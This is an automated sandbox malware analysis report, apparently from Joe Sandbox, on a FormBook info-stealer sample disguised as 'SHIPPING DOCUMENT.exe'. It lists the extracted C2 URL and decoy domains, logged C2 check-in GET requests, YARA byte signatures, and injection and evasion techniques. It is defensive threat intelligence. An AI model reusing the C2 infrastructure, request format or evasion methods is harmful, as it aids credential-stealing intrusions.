Loading ...

Play interactive tourEdit tour

Analysis Report SHIPPING DOCUMENT.exe

Overview

General Information

Sample Name:SHIPPING DOCUMENT.exe
Analysis ID:404217
MD5:25e847b9631bc2fe8d87fe4278fa142e
SHA1:641756a84fdce68e101a53cfa6809b68190b7ad7
SHA256:70dfd7bc81878d265e39803f73f55af96d7bf2a336408b52cc6005785fbe0415
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SHIPPING DOCUMENT.exe (PID: 7060 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
    • SHIPPING DOCUMENT.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 5752 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6948 cmdline: /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.1.SHIPPING DOCUMENT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.SHIPPING DOCUMENT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dllReversingLabs: Detection: 17%
          Multi AV Scanner detection for submitted fileShow sources
          Source: SHIPPING DOCUMENT.exeVirustotal: Detection: 34%Perma Link
          Source: SHIPPING DOCUMENT.exeReversingLabs: Detection: 44%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SHIPPING DOCUMENT.exeJoe Sandbox ML: detected
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SHIPPING DOCUMENT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: SHIPPING DOCUMENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: SHIPPING DOCUMENT.exe, 00000000.00000003.656956738.0000000003270000.00000004.00000001.sdmp, SHIPPING DOCUMENT.exe, 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SHIPPING DOCUMENT.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,0_2_0040659C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.knighttechinca.com/dxe/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.barkinlot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.buyruon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.fuerzaagavera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.union-green.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.barkinlot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.buyruon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.fuerzaagavera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.union-green.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.barkinlot.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SHIPPING DOCUMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SHIPPING DOCUMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.917278405.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: http://www.yabovip1288.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?2f7ed51008e649f38c9a7a932b01f7d5
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040548D

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
